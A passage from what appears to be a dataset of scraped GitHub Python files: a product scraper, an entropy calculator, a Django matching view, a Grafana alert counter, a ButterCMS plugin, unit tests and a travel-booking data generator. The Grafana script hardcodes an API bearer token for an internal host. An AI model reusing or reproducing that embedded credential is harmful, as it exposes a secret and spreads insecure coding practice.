response.xpath('//*[@class=\"subcategory_link\"]/@href').extract()\n for link in sub_links:\n yield response.follow(link, self.parseSubCategory)\n\n def parseSubCategory(self, response):\n sub_links = response.xpath('//*[@class=\"subcategory_link\"]/@href').extract()\n if sub_links:\n for link in sub_links:\n yield response.follow(link, self.parseSubCategory)\n else:\n\n product_links = response.xpath('//*[@class=\"v-product__title productnamecolor colors_productname\"]/@href').extract()\n if product_links:\n cat = response.url.rsplit('/', 1)[1]\n cat = cat.rsplit('.', 1)[0]\n yield response.follow(response.url + '?&cat='+cat+'&show=300')\n product_links = response.xpath('//*[@class=\"v-product__title productnamecolor colors_productname\"]/@href').extract()\n for product_link in product_links:\n yield response.follow(product_link, self.parseProduct)\n \n\n def parseProduct(self, response):\n product = ElectricbargainstoresItem()\n product['Name'] = response.xpath('//title/text()').extract_first()\n product['ProductCode'] = response.xpath('//*[@class=\"product_code\"]/text()').extract_first()\n product['Price'] = '$'+response.xpath('//*[@itemprop=\"price\"]/text()').extract_first()\n desc = response.xpath('//*[@id=\"ProductDetail_ProductDetails_div2\"]//tr/descendant::*/text()').extract()\n descrip = \"\"\n for l in desc:\n descrip = descrip + \" \" + l.strip()\n product['TechSpecs'] = descrip.strip().replace('\\n',' ')\n photo_links = response.xpath('//*[@id=\"altviews\"]/a/@href').extract()\n if photo_links:\n for j in range(len(photo_links)):\n if photo_links[j][1]=='/':\n photo_links[j] = \"http://\"+photo_links[j][2:]\n if photo_links[j][1]=='v':\n photo_links[j]= 'https://www.electricbargainstores.com'+photo_links[j]\n\n else:\n photo_links= response.xpath('//*[@property=\"og:image\"]/@content').extract()\n for j in range(len(photo_links)):\n if photo_links[j][1]=='/':\n photo_links[j] = \"http://\"+photo_links[j][2:]\n if photo_links[j][1]=='v':\n photo_links[j]= 'https://www.electricbargainstores.com'+photo_links[j]\n \n product['ProductPhoto'] = photo_links \n pdf_links = response.xpath('//*[(@id = \"ProductDetail_TechSpecs_div\")]//a/@href').extract()\n for j in range(len(pdf_links)):\n if pdf_links[j][1]=='/':\n pdf_links[j] = \"http://www.\"+pdf_links[j][2:]\n if pdf_links[j][1]=='v':\n pdf_links[j]= 'https://www.electricbargainstores.com'+pdf_links[j]\n \n\n product['PDFlink'] = pdf_links\n dl_links = product['ProductPhoto'] + product['PDFlink']\n paths = []\n # use your own path for output folder\n dir = r'C:\\Users\\karti\\Desktop\\projects\\electricbargainstores\\electricbargainstores\\output'\n os.chdir(dir)\n dir = product['ProductCode']\n os.mkdir(dir)\n os.chdir(os.getcwd() +'\\\\'+dir)\n i=1\n for lnk in dl_links:\n\n r = requests.get(lnk,allow_redirects=True)\n content_type = r.headers['content-type']\n ext = mimetypes.guess_extension(content_type)\n fname = product['ProductCode'] + '-'+ str(i) + ext\n open(fname, 'wb').write(r.content)\n paths.append('output/'+ product['ProductCode']+'/'+fname)\n i=i+1\n\n \n \n \n product['PhotoPath'] = paths[:len(product['ProductPhoto'])]\n product['PDFPath'] = paths[len(product['ProductPhoto']):]\n product['Link'] = response.url\n yield product\n","repo_name":"kartikay10/electricbargainstorescraper","sub_path":"electricbargainstores/spiders/store_scraper.py","file_name":"store_scraper.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"18199559186","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 30 02:58:22 2022\n\n@author: renee\n\"\"\"\nimport re\nimport math\nfrom prettytable import PrettyTable\nimport numpy\n#import random\n#import time\n\nentropy_0 = []\n\nfor i in range(1, 46):\n print(i)\n path = '/Users/renee/Documents/Eng/' + str(i) + '.txt'\n with open(path) as data:\n datacontext = data.read()\n data.close()\n with open(\"/Users/renee/Documents/Eng/d2.txt\", 'a') as data_1:\n data_1.write(datacontext)\n data_1.close()\n with open(\"/Users/renee/Documents/Eng/d2.txt\", 'r', encoding='UTF-8') as f:\n content = f.read()\n\n # print('预处理前的字符串:')\n #print(content)\n # Str =content#引入数据\n content = content.replace(\"Please go to\", '')\n content = content.replace(\"install our App to read the latest chapters for free\", '')\n content = content.replace(\"Previous Chapter\", '')\n content = content.replace(\"Next Chapter\", '')\n content = content.replace(\"E.3.3.\", '')\n content = content.replace(\"Chapter\", '')\n a = re.findall(r'[^\\*\"/:?|,!-.%‘—;()’“”‘’。°【0123–456789】<>\\[\\]]', content, re.S) #\n a1 = \"\".join(a) # 去掉特殊字符\n b = a1.lower() # 大写变小写\n c = ' '.join(b.split()) # 去连续的空格\n '''fh = open('/Users/renee/Documents/'+title+'Res.txt', 'w', encoding='utf-8')#写操作\n fh.write(c)\n fh.close()\n\n with open('/Users/renee/Documents/'+title+'Res.txt','r',encoding='UTF-8') as f: # 遍历\n content1 = f.read()'''\n Str1 = c\n # print('预处理后的字符串:')\n # print(Str1)\n sum_1 = 0\n Hx = 0\n k = 0\n j = 0\n s = 0\n Hx = []\n for a1 in Str1:\n if a1 in 'abcdefghijklmnopqrstuvwxyz ':\n sum_1 += 1\n print(f'\"字符总数为\":{sum_1}个')\n # strfloat=numpy.empty(27,dtype=float)\n # strArr=numpy.empty(27,dtype=str)\n resoult = {} # 定义一个空字典\n for i in 'abcdefghijklmnopqrstuvwxyz ': # 遍历输入的字符串,以键值对的方式存储在字典中\n resoult[i] = Str1.count(i)\n # print(type(Str1.count))\n for key in resoult: # 遍历字典,格式化输出结果\n Hx.append((resoult[key] / sum_1) * math.log((sum_1 / resoult[key]), 2)) # 信\n print(Hx)\n Hx_1 =round(sum(Hx),5)\n print(Hx_1)\n entropy_0.append(Hx_1)\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(2, 92, 45)\nplt.title('Change of Shannon Entropy for English texts')\nplt.xlabel('File Size(M)')\nplt.ylabel('Shannon Entropy(Bits/letter)')\nplt.plot(x, entropy_0, color='purple'\n )\n","repo_name":"ReneeD1120/NLP_Shannon_Entropy","sub_path":"code/Shannon_entropy_Eng.py","file_name":"Shannon_entropy_Eng.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4432682654","text":"from django.shortcuts import render, redirect\nfrom ..conversations.models import Conversation\nfrom ..new_users.models import User, Profile, Preference\n\n# Create your views here.\ndef index(request, page_num):\n logged_in_user = User.objects.get(id=request.session['logged_in_user'])\n logged_in_profile = Profile.objects.get(user=logged_in_user)\n logged_in_preference = Preference.objects.get(user=logged_in_user)\n\n\n # Getting thet start and end values for the query\n # start = (int(page_num) - 1) * 10\n # end = int(page_num) * 10\n\n # Excluding the same gender as the person logged on and from start to end\n # possible_matches = Profile.objects.exclude(sex=logged_in_profile.sex)[start:end]\n possible_matches = Profile.objects.exclude(sex=logged_in_profile.sex)\n \n matches = []\n\n for person in possible_matches:\n score = 50.0\n\n # Age matches what they want\n if person.age < 
logged_in_preference.age_max and person.age > logged_in_preference.age_min:\n score += 12.5\n \n # Age does not match what they want\n else:\n # Check deal breaker\n if logged_in_preference.age_deal_breaker:\n score -= 25\n else:\n score -= 12.5\n\n\n\n # Height in feet matches what they want\n if person.height_feet < logged_in_preference.height_feet_max and person.height_feet > logged_in_preference.height_feet_min:\n score += 12.5\n\n # Check is their height in feet is equal to the min height they want and see if with inches they are still taller\n elif person.height_feet == logged_in_preference.height_feet_min and person.height_inch >= logged_in_preference.height_inch_min:\n score += 12.5\n\n # Check is their height in feet is equal to the max height they want and see if with inches they are still shorter\n elif person.height_feet == logged_in_preference.height_feet_max and person.height_inch <= logged_in_preference.height_inch_max:\n score += 12.5\n\n # If they are outside of the range\n else:\n if logged_in_preference.height_deal_breaker:\n score -= 25\n else:\n score -= 12.5\n\n\n # Body type matches what they want\n if person.body_type == logged_in_preference.body_type:\n score += 12.5\n\n # Body type does not match what they want\n else:\n # Check deal breaker\n if logged_in_preference.body_deal_breaker:\n score -= 25\n else:\n score -12.5\n\n\n\n # Salary range matches what they want\n if person.salary_range == logged_in_preference.salary_range:\n score += 12.5\n \n # Salary range does not match what they want\n else:\n # Check deal breaker\n if logged_in_preference.salary_deal_breaker:\n score -= 25\n else:\n score -= 12.5\n\n \n # After calculating score\n if score < 0:\n score = 0\n\n dic = {\n 'user' : person.user,\n 'score' : score,\n }\n \n # Checking if the user and match have a conversation\n conversation = Conversation.objects.filter(user=logged_in_user).filter(user=person.user)\n if len(conversation) > 0:\n dic['conversation'] = conversation[0]\n\n matches.append(dic)\n\n context = {\n 'page' : page_num,\n 'matches' : matches,\n }\n\n return render(request, 'match/match.html', context)","repo_name":"NathanHaberman/Python-Project-2017","sub_path":"apps/match/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69843141253","text":"#!/usr/bin/env python\n\nimport argparse\nimport json\nimport requests\nimport time\nimport sys\n\n\nversion = 0.50\n\nclass TokenAuth(requests.auth.AuthBase):\n \"\"\"Authentication using a Grafana API token.\"\"\"\n def __init__(self, token):\n self.token = token\n\n def __call__(self, request):\n request.headers.update({\n \"Authorization\": \"Bearer {0}\".format(self.token)\n })\n return request\n\nif __name__ == \"__main__\":\n url = 'http://core1.local:3000/api/alerts'\n g = (requests.get(url, auth=TokenAuth(\"eyJrIjoieWhjZ1pMSlZvdFBsTXgzZXFqQzVSeDNZRnBTbVRSNVYiLCJuIjoibW9uaXRvciIsImlkIjoxfQ==\")).text)\n gdata = json.loads(g)\n issuecount = 0 \n for i in gdata:\n if i['state'] != \"ok\":\n issuecount += 1 \n print(issuecount)\n \n\n","repo_name":"fvanrooyen/alexa-crypto-ask","sub_path":"get-value.py","file_name":"get-value.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19785220036","text":"#Project receives a sentence from a user and converts it to Pig Latin, then returns it to the user\n\n# get sentence 
from user\noriginal = input('Please enter a sentence: ').strip().lower()\n\n#split sentence into words\nwords = original.split()\n\n# loop through words and convert to pig latin\nnew_words = []\n\nfor word in words:\n if word[0] in \"aeiou\": #for words starting with a vowel, add 'yay'\n add_word = word + 'yay'\n else: # for words starting with consonants, take first consonant cluster and move to back, then add 'ay'\n vowel_pos = 0\n for letter in word:\n if letter not in \"aeiou\":\n vowel_pos += 1\n else:\n break\n add_word = word[vowel_pos:] + word[:vowel_pos] + 'ay'\n new_words.append(add_word)\n\n# stick words back together into sentence\noutput = \" \".join(new_words)\n\n# output the final string\nprint(output)","repo_name":"mmcfarlin107/Python_Bible_Mini_Projects","sub_path":"pig_latin_converter.py","file_name":"pig_latin_converter.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35526648121","text":"from pathlib import Path\n\nimport pandas as pd\nfrom deepdiff import DeepDiff\n\nimport model\n\ncustomer = {\n \"cust\": {\n \"riskperformance\": 0,\n \"externalriskestimate\": 79,\n \"msinceoldesttradeopen\": 133,\n \"msincemostrecenttradeopen\": 2,\n \"averageminfile\": 68,\n \"numsatisfactorytrades\": 27,\n \"numtrades60ever2derogpubrec\": 0,\n \"numtrades90ever2derogpubrec\": 0,\n \"percenttradesneverdelq\": 100,\n \"msincemostrecentdelq\": -7,\n \"maxdelq2publicreclast12m\": 7,\n \"maxdelqever\": 8,\n \"numtotaltrades\": 30,\n \"numtradesopeninlast12m\": 3,\n \"percentinstalltrades\": 36,\n \"msincemostrecentinqexcl7days\": 0,\n \"numinqlast6m\": 4,\n \"numinqlast6mexcl7days\": 4,\n \"netfractionrevolvingburden\": 1,\n \"netfractioninstallburden\": 93,\n \"numrevolvingtradeswbalance\": 4,\n \"numinstalltradeswbalance\": 2,\n \"numbank2natltradeswhighutilization\": 0,\n \"percenttradeswbalance\": 60,\n },\n \"cust_id\": 6,\n}\n\n\nclass MockModel:\n def __init__(self, value=10):\n self.value = value\n\n def score(self, X):\n n = len(X)\n return [self.value] * n\n\n\ndef read_text(file):\n test_directory = Path(__file__).parent\n\n with open(test_directory / file, 'rt', encoding='utf-8') as f_in:\n return f_in.read().strip()\n\n\ndef test_predict():\n model_mock = MockModel(10)\n model_service = model.ModelService(model_mock)\n customer_data = pd.DataFrame([customer[\"cust\"]])\n actual_score = model_service.predict(customer_data)\n expected_score = 10\n\n assert actual_score == expected_score\n\n\ndef test_lambda_handler():\n model_mock = MockModel(10)\n model_version = \"test123\"\n model_service = model.ModelService(model=model_mock, model_version=model_version)\n\n base64_input = read_text('data.b64')\n event = {\n \"Records\": [\n {\n \"kinesis\": {\n \"data\": base64_input,\n },\n }\n ]\n }\n actual_scores = model_service.lambda_handler(event)\n expected_scores = {\n \"predictions\": [\n {\n 'model': 'risk_score_model',\n 'version': model_version,\n 'prediction': {\n 'cust_score': 10,\n 'cust_id': 6,\n },\n },\n ]\n }\n\n assert actual_scores == expected_scores\n\n\ndef test_base64_decode():\n base64_input = read_text('data.b64')\n actual_result = model.base64_decode(base64_input)\n expected_result = customer\n\n assert actual_result == expected_result\n\n\ndef test_prepare_features():\n model_service = model.ModelService(None)\n\n actual_features = model_service.prepare_features(customer)\n expected_features = pd.DataFrame([customer[\"cust\"]])\n print(actual_features)\n 
print(expected_features)\n\n diff = DeepDiff(\n actual_features.to_dict(orient=\"records\"),\n expected_features.to_dict(orient=\"records\"),\n significant_digits=1,\n )\n assert 'values_changed' not in diff\n assert 'values_change' not in diff\n print(\"Difference is: \", diff)\n\n\n# test_prepare_features()\n","repo_name":"jnsofini/reliable-credit-scoring-system","sub_path":"automation/tests/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"44"} +{"seq_id":"3251118986","text":"from collections import defaultdict\nimport datetime\nimport logging\n\nfrom pelican import signals\n\nfrom operator import attrgetter, itemgetter\nfrom functools import partial\n\nfrom pelican.generators import ArticlesGenerator, Generator\nfrom pelican.contents import Article, Page, Static\nfrom pelican.utils import copy, process_translations, mkdir_p\nfrom pelican.readers import BaseReader, Readers\n\nfrom butter_cms import ButterCMS\n\nfrom dateutil import parser\n\n\nlogger = logging.getLogger()\n\n\nclass ButterGenerator(ArticlesGenerator):\n def __init__(self, *args, **kwargs):\n \"\"\"initialize properties\"\"\"\n self.articles = [] # only articles in default language\n self.translations = []\n self.dates = {}\n self.categories = defaultdict(list)\n self.authors = defaultdict(list)\n super(ButterGenerator, self).__init__(*args, **kwargs)\n\n # 'cause settings is initialized in super\n self.client = ButterCMS(self.settings.get('BUTTER_CONFIG')['api_key'])\n\n # Private helper function to generate\n def _generate_butter_articles(self):\n DEFAULT_CATEGORY = self.settings.get('DEFAULT_CATEGORY')\n baseReader = BaseReader(self.settings)\n\n butter_posts = []\n page = 1\n while True:\n # Paginate through all pages\n result = self.client.posts.all({'page_size': 10, 'page': page})\n if 'data' in result:\n butter_posts.extend(result['data'])\n\n if 'meta' in result and 'next_page' in result['meta'] and result['meta']['next_page']:\n page += 1\n else:\n break\n all_articles = []\n counter = 0\n for post in butter_posts:\n if post['status'] == 'published':\n counter += 1\n logger.info('GET TO article: %s' % post['title'])\n logger.info('counter: %s' % str(counter))\n datestr = post['published'] if 'published' in post else post['created']\n date = parser.parse(datestr)\n title = post['title']\n content = post['body']\n author = post['author']['first_name']\n authorObject = baseReader.process_metadata('author', author)\n slug = post['slug'] if 'slug' in post else None\n logger.info('--HAS slug: %s' % str(slug))\n categoryObj = None\n if post['categories']:\n category = post['categories'][0]['name']\n else:\n category = DEFAULT_CATEGORY\n categoryObj = baseReader.process_metadata('category', category)\n\n metadata = {'title': title,\n 'date': date,\n 'category': categoryObj,\n 'authors': [authorObject]}\n if slug:\n metadata['slug'] = slug\n\n\n article = Article(content=content,\n metadata=metadata,\n settings=self.settings,\n context=self.context)\n\n # # This seems like it cannot happen... 
but it does without fail.\n article.author = article.authors[0]\n all_articles.append(article)\n\n return all_articles\n\n def generate_context(self):\n # Update the context (only articles in default language)\n self.articles = self.context['articles']\n\n all_articles = []\n\n new_articles = self._generate_butter_articles()\n all_articles.extend(new_articles)\n\n # Continue with the rest of ArticleGenerator, code adapted from:\n # https://github.com/getpelican/pelican/blob/master/pelican/generators.py#L548\n\n # ARTICLE_ORDER_BY doesn't exist in 3.3, which was in Fedora 21.\n # (I wanted to be able to build this on F21 at the time).\n articles, translations = process_translations(all_articles)\n # , order_by=self.settings['ARTICLE_ORDER_BY'])\n self.articles.extend(articles)\n self.translations.extend(translations)\n\n # Disabled for 3.3 compatibility, great.\n # signals.article_generator_pretaxonomy.send(self)\n\n for article in self.articles:\n # only main articles are listed in categories and tags\n # not translations\n self.categories[article.category].append(article)\n if hasattr(article, 'tags'):\n for tag in article.tags:\n self.tags[tag].append(article)\n for author in getattr(article, 'authors', []):\n self.authors[author].append(article)\n\n # This may not technically be right, but...\n # Sort the articles by date too.\n self.articles = list(self.articles)\n self.dates = self.articles\n self.dates.sort(key=attrgetter('date'),\n reverse=self.context['NEWEST_FIRST_ARCHIVES'])\n\n # and generate the output :)\n\n # order the categories per name\n self.categories = list(self.categories.items())\n self.categories.sort(reverse=self.settings['REVERSE_CATEGORY_ORDER'])\n\n self.authors = list(self.authors.items())\n self.authors.sort()\n\n logger.info('++++++++++++++++++++++++++++++++++++')\n logger.info('GOT categories %s' % str(self.categories))\n logger.info('++++++++++++++++++++++++++++++++++++')\n\n self._update_context(('articles', 'dates', 'categories', 'authors'))\n # Disabled for 3.3 compatibility for now, great.\n # self.save_cache()\n # self.readers.save_cache()\n\n # And finish.\n # signals.article_generator_finalized.send(self)\n\n # def generate_output(self, writer):\n # # Intentionally leave this blank\n # pass\n\n def generate_pages(self, writer):\n \"\"\"Generate the pages on the disk\"\"\"\n write = partial(writer.write_file,\n relative_urls=self.settings['RELATIVE_URLS'],\n override_output=True)\n\n # to minimize the number of relative path stuff modification\n # in writer, articles pass first\n # self.generate_articles(write)\n self.generate_period_archives(write)\n self.generate_direct_templates(write)\n\n # and subfolders after that\n self.generate_categories(write)\n self.generate_authors(write)\n\n\ndef get_generators(pelican_object):\n return ButterGenerator\n\n\ndef register():\n signals.get_generators.connect(get_generators)\n","repo_name":"ButterCMS/buttercms-pelican","sub_path":"butter.py","file_name":"butter.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"27637900402","text":"#31. 
Next Permutation\ndef nextPermutation(nums):\n if len(nums) <= 1:\n return nums\n i , j , k = len(nums) -2, len(nums)-1, len(nums)-1;\n ## take 12385764 as example i points 6 , j k points 4\n # keep moving i, j pair forward if nums[i] <= nums[j]\n # now the i is 5 and j is 7\n while i >=0 and nums[i] >= nums[j]:\n i -= 1\n j -= 1\n # find out the num smaller than i move k forward\n if i >= 0:\n while nums[i] >= nums[k]:\n k -= 1\n # 4 is small than 5 and swap i,k \n nums[i], nums[k] = nums[k], nums[i]\n # we also need to make the whole perm smallest \n # so from j towards need to be revesed \n nums[j:] = reversed(nums[j:])\n \n print(nums)\nnums = [1,4,1]\nnums = [4,1,1]\nnextPermutation(nums)\n\n","repo_name":"git874997967/LeetCode_Python","sub_path":"mid/leetCode31.py","file_name":"leetCode31.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35593486637","text":"import utils\nimport time\nimport random\nimport datetime\nfrom urllib.parse import urlparse, parse_qsl, urlencode\nimport requests\n# use postgres, put results in database. Send everything to checkout service which will automatically put it into the checkout service\nimport json\nimport os\n\nusers = utils.load_json(\"user.json\")\ndestinations = utils.load_json(\"destination.json\")\nhotel = \"http://169.63.175.87:32461/api/v1/hotels\"\ncars = \"http://169.63.175.87:30505/api/v1/cars\"\n# flight = \"http://localhost:9103/api/v2/flights\"\n\n\ndef get_reason(reason):\n chance = random.randint(0, 100)\n if chance > 85:\n return random.choice([\"business\", \"leisure\", \"family\"])\n\n return reason\n\n\ndef get_carhotel_loyalty_status(priority, main_reason, frequency, randnum):\n val = 1\n if priority == \"comfort\":\n val = val * 7\n elif priority == \"luxury\":\n val = val * 6\n elif priority == \"time\":\n val = val * 5\n else:\n val = val * 4\n\n if frequency >= 24:\n val = val * 7\n elif (frequency < 24 and frequency >= 12):\n val = val * 6\n else:\n val = val * 4\n\n if main_reason == \"business\":\n val = val * 8\n elif main_reason == \"family\":\n val = val*4\n else:\n val = val * 6\n\n if val > randnum:\n return True\n\n return False\n\n\ndef get_flight_loyalty_status(priority, main_reason, frequency, randnum):\n val = 1\n if priority == \"comfort\":\n val = val * 8\n elif priority == \"luxury\":\n val = val * 6\n elif priority == \"time\":\n val = val * 3\n else:\n val = val * 4\n\n if frequency >= 24:\n val = val * 8\n elif (frequency < 24 and frequency >= 12):\n val = val * 6\n else:\n val = val * 4\n\n if main_reason == \"business\":\n val = val * 5\n elif main_reason == \"family\":\n val = val * 4\n else:\n val = val * 6\n\n if val > randnum:\n return True\n\n return False\n\n\ndef get_random_num():\n randnum = float(random.randint(0, 100))/100.0\n return randnum\n\n\ndef get_group_size(usual): # usual: whatever num they usually travel with, 80/20 split chance\n rand = random.randint(0, 100)\n if rand > 80:\n return random.randint(1, 6)\n return usual\n\n\ndef get_travel_day_offset(reason, priority):\n chance = random.randint(0, 100)\n if reason == \"business\":\n if chance < 60:\n return random.randint(1, 14)\n elif chance < 90:\n return random.randint(15, 24)\n else:\n return random.randint(25, 30)\n else:\n if priority == \"budget\":\n return random.randint(30, 60)\n else:\n return random.randint(15, 50)\n\n # more likely to be leisure if (1. leaving 20-60 days in advanced (2. 
also 2 people or more\n # if traveling 1-19 days in advance, 15% chance of being leisure. if also income > 200,000 then only 10% chance of leisure\n # if traveling 20-30 days in advance and 1 person, only 40% chance of being leisure\n # if traveling 20-30 days in advance and 2-3 people, 60% chance of being leisure\n # if traveling 20-30 days in advance and 4 or more people, 90% chance of being leisure\n # if traveling 30-60 days in advanced, 85% chance of leisure\n\n\ndef get_travel_duration(reason, priority): # generate date based on reason\n timed = 0\n if reason == \"business\": # I could also do 80% of the time select 1-7\n if priority == \"time\":\n timed = random.choice([1, 1, 2, 2, 2, 3, 3, 3, 4, 5, 6, 7])\n else:\n timed = random.choice(\n [1, 1, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 6, 6, 7, 7, 8, 9, 10])\n else:\n if priority != \"budget\":\n timed = random.choice([2, 3, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 6, 7, 7, 8, 8,\n 8, 8, 8, 9, 9, 9, 9, 9, 10, 10, 11, 12, 13, 14, 14, 15, 16, 16, 16, 17, 18])\n else:\n timed = random.choice(\n [2, 3, 3, 3, 3, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 7, 7, 8, 9, 10, 12, 13, 14])\n return timed\n\n\ndef query_gen(query):\n q = \"\"\n for key, val in query.items():\n if q != \"\":\n q = q + \"&\"\n else:\n q = \"?\"\n q = q + key + \"=\" + val.replace(\" \", \"%20\")\n return q\n\n\ndef kebab_case(val):\n return val.lower().replace(\" \", \"-\")\n\n\ndef get_destination(usual, destinations): # list of frequenty traveled locaitons\n chance = random.randint(0, 100)\n if chance > 80:\n return random.choice(destinations)\n return random.choice(usual)\n\n\ndef convert_tuplelist_to_dict(query_tuple):\n result_dict = {}\n for k, v in query_tuple:\n result_dict[k] = v\n return result_dict\n\n\ndef delete_dict_key(dictionary, key):\n if key in dictionary:\n dictionary.pop(key)\n\n\ndef generate_user_hotel(hotel_full_url, priority, party_size):\n # print(\"\\thotel_full_url: \", hotel_full_url)\n try:\n data = requests.get(hotel_full_url).json()\n if type(data) == list:\n if len(data) != 0: # if the results do not come back empty\n if priority == \"budget\":\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2))\n return sorted_data[0]\n elif priority == \"comfort\":\n num = int(len(data)//2)-1\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2), reverse=True)\n return sorted_data[num]\n\n else:\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2), reverse=True)\n return sorted_data[0]\n else:\n parse_url = urlparse(hotel_full_url)\n #print(\"parse_url: \", parse_url)\n query_tuple = parse_qsl(parse_url.query)\n\n #print(\"\\tquery_dict\", convert_tuplelist_to_dict(query_tuple))\n query_dict = convert_tuplelist_to_dict(query_tuple)\n if \"superchain\" in query_dict:\n #print(\"removing superchain...\")\n delete_dict_key(query_dict, \"superchain\")\n elif \"type\" in query_dict:\n #print(\"removing type...\")\n delete_dict_key(query_dict, \"type\")\n else:\n return \"\\tNo Results -- hotel json generation\\n\"\n new_hotel_url = parse_url.scheme + \"://\" + \\\n parse_url.netloc + parse_url.path + query_gen(query_dict)\n return generate_user_hotel(new_hotel_url, priority, party_size)\n else:\n return \"\\tNo Results -- hotel json generation\\n\"\n except:\n time.sleep(10)\n print(\"EXCEPTION HOTEL\")\n return \"\\tNo Results -- car json generation\"\n # http: // localhost: 9101/api/v1/hotels/indonesia/jakarta?superchain = Urban % 20Lifestyle & type = luxury & dateFrom = 2020-08-03 & dateTo = 2020-08-08\n\n\ndef 
generate_user_car(car_full_url, priority, party_size):\n try:\n data = requests.get(car_full_url).json()\n if type(data) == list:\n if len(data) != 0: # if the results do not come back empty\n # http://localhost:9102/api/v1/cars/mexico/mexico-city?rental_company=Carlux&style=luxury&dateFrom=2020-07-25&dateTo=2020-07-26\n if priority == \"budget\":\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2))\n return sorted_data[0]\n elif priority == \"comfort\":\n num = int(len(data)//2)-1\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2), reverse=True)\n return sorted_data[num]\n\n else: # if results do not come back empty AND budget/time\n sorted_data = sorted(\n data, key=lambda x: round(float(x[\"cost\"]), 2), reverse=True)\n return sorted_data[0]\n else: # first get request returns empty response, remove loyalty program parameter\n parse_url = urlparse(car_full_url)\n #print(\"parse_url: \", parse_url)\n query_tuple = parse_qsl(parse_url.query)\n #print(\"\\tquery_dict\", convert_tuplelist_to_dict(query_tuple))\n query_dict = convert_tuplelist_to_dict(query_tuple)\n if \"rental_company\" in query_dict:\n #print(\"removing rental company...\")\n delete_dict_key(query_dict, \"rental_company\")\n elif party_size > 4 and priority != \"budget\" and \"style\" in query_dict:\n #print(\"removing style for large party...\")\n delete_dict_key(query_dict, \"style\")\n elif \"body_type\" in query_dict:\n #print(\"removing body_type...\")\n delete_dict_key(query_dict, \"body_type\")\n elif (party_size <= 4 or priority == \"budget\") and (\"style\" in query_dict):\n #print(\"removing style for small party or budget users...\")\n delete_dict_key(query_dict, \"body_type\")\n else:\n return \"\\tNo Results -- hotel json generation\\n\"\n new_hotel_url = parse_url.scheme + \"://\" + \\\n parse_url.netloc + parse_url.path + query_gen(query_dict)\n return generate_user_hotel(new_hotel_url, priority, party_size)\n else:\n return \"\\tNo Results -- car json generation\\n\"\n except:\n time.sleep(10)\n print(\"EXCEPTION CAR\")\n return \"\\tNo Results -- car json generation\"\n\n\n# 1 luxury\n# # if no results remove rental_company=... before the first &\n# # if still no results, remove body_type if party size < 4 and if not then remove style\n# # if still no results, remove style\n# 2 budget\n# # if no results remove rental_company=... before the first &\n# # if still no results, remove body_type if party size < 4 and if not then remove style\n# # if still no results, remove style\n# 3 comfort\n# # if no results remove rental_company=... 
before the first &\n# # if still no results, remove body_type if party size < 4 and if not then remove style\n# # if still no results, remove style\n\n\ndef format_postgres(one_user_dict, hotel_full_url, car_full_url, priority, party_size):\n string = \"\"\n initialized_dict = {\"totalAmount\": 0.00, \"currency\": \"USD\", \"status\": \"unprocessed\", \"cartItems\": [{}], \"billingDetails\": {\n }, \"paymentMethodDetails\": {\"type\": \"Card\", \"creditcardNumber\": \"0000 0000 0000 0000\", \"expMonth\": 1, \"expYear\": 2050, \"cvc\": \"0000\"}}\n if \"cars\" in car_full_url: # for the future in case we provide a blank string when people do not purchase hotel and car at same time\n carjson = generate_user_car(car_full_url, priority, party_size)\n if (type(carjson) is dict) and (\"error\" not in carjson):\n initialized_dict[\"cartItems\"][0][\"type\"] = \"Car\"\n cartItemsCar_dict = initialized_dict[\"cartItems\"][0]\n cartItemsCar_dict['uuid'] = carjson['id']\n cartItemsCar_dict[\"description\"] = \"description\"\n cartItemsCar_dict[\"cost\"] = carjson[\"cost\"]\n cartItemsCar_dict[\"currency\"] = \"USD\"\n dateTo = car_full_url.split(\n \"&\")[-1].split(\"=\")[1].replace(\"-\", \" \")\n yearTo, monthTo, dayTo = dateTo.split(\" \")\n string = monthTo + \" \" + dayTo + \" \" + yearTo\n cartItemsCar_dict[\"endDate\"] = string\n dateFrom = car_full_url.split(\n \"&\")[-2].split(\"=\")[1].replace(\"-\", \" \")\n yearFrom, monthFrom, dayFrom = dateFrom.split(\" \")\n string = monthFrom + \" \" + dayFrom + \" \" + yearFrom\n cartItemsCar_dict[\"startDate\"] = string\n billingDetails = initialized_dict[\"billingDetails\"]\n # CAN WE ASSUME NAMES ARE ALWAYS JUST 2 WORDS???)\n billingDetails[\"firstName\"] = one_user_dict[\"name\"].split(\" \")[0]\n billingDetails[\"lastName\"] = one_user_dict[\"name\"].split(\" \")[-1]\n billingDetails[\"address\"] = {}\n billingDetails[\"address\"][\"line1\"] = \"00 Non\"\n billingDetails[\"address\"][\"city\"] = one_user_dict[\"city\"]\n billingDetails[\"address\"][\"postalCode\"] = \"00000\"\n billingDetails[\"address\"][\"state\"] = \"Non\"\n billingDetails[\"address\"][\"country\"] = 